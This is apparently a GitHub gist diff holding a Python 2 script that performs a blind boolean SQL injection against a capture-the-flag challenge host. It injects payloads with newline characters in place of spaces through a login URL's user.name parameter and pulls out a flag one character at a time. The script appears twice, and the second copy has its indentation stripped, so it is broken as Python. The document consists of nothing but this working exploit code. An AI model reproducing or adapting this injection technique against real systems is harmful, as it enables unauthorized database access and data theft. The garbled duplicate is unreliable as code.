chfanghr · March 11, 2020 09:25
diff --git a/gistfile1.txt b/gistfile1.txt
 import requests
 s=requests.session()

 flag=''
 for i in range(1,50):
    p=''
    for j in range(1,255):
        payload="(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'"
        #print payload
        url="http://55a37af9-cb39-4361-a2cb-9b30b468527c.node3.buuoj.cn/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
        r1=s.get(url)
        #print url
        #print len(r1.text)
        if len(r1.text)>20000 and p!='':
            flag+=p
            print i,flag
            break
        p=chr(j)
	import requests
	s=requests.session()

	flag=''
	for i in range(1,50):
	p=''
	for j in range(1,255):
	payload="(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'"
	#print payload
	url="http://55a37af9-cb39-4361-a2cb-9b30b468527c.node3.buuoj.cn/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
	r1=s.get(url)
	#print url
	#print len(r1.text)
	if len(r1.text)>20000 and p!='':
	flag+=p
	print i,flag
	break
	p=chr(j)